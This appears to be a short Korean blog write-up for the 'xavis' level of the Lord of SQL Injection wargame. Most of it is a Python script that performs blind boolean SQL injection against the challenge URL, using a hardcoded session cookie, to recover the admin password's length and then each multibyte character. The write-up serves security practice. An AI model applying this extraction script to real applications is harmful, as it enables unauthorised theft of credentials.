[load of sql injection] xavis

webhacking/load of sql injection 2018. 11. 17. 17:40

PW가 ASCII 문자가 아니라 멀티바이트 문자형식이다.

import requests

url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"

cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID

list1 = []

for i in range(0,100):

text = "' or id='admin' and length(pw)="+str(i)+" -- "

params = { 'pw' : text}

response = requests.get( url, params = params, cookies = cookies )

if( "Hello admin" in response.text):

print( response.text )

break

for k in range( 0, i+1 ):

for j in range( ord('0'), 300):

text = "' or id='admin' and length(pw)="+str(i)+" and ord(substr(pw,"+str(k)+",1))="+str(j)+" -- "

params = { 'pw' : text }

print( response.text )

response = requests.get( url, params = params, cookies = cookies )

if( "Hello admin" in response.text ):

print( response.text )

list1.append(chr(j))

break

print(list1)

[load of sql injection] iron_golem (0)	2018.11.18
[load of sql injection] dragon (0)	2018.11.17
[load of sql injection] nightmare (0)	2018.11.17
[load of sql injection] succubus (0)	2018.11.17
[load of sql injection] zombie_assassin (0)	2018.11.17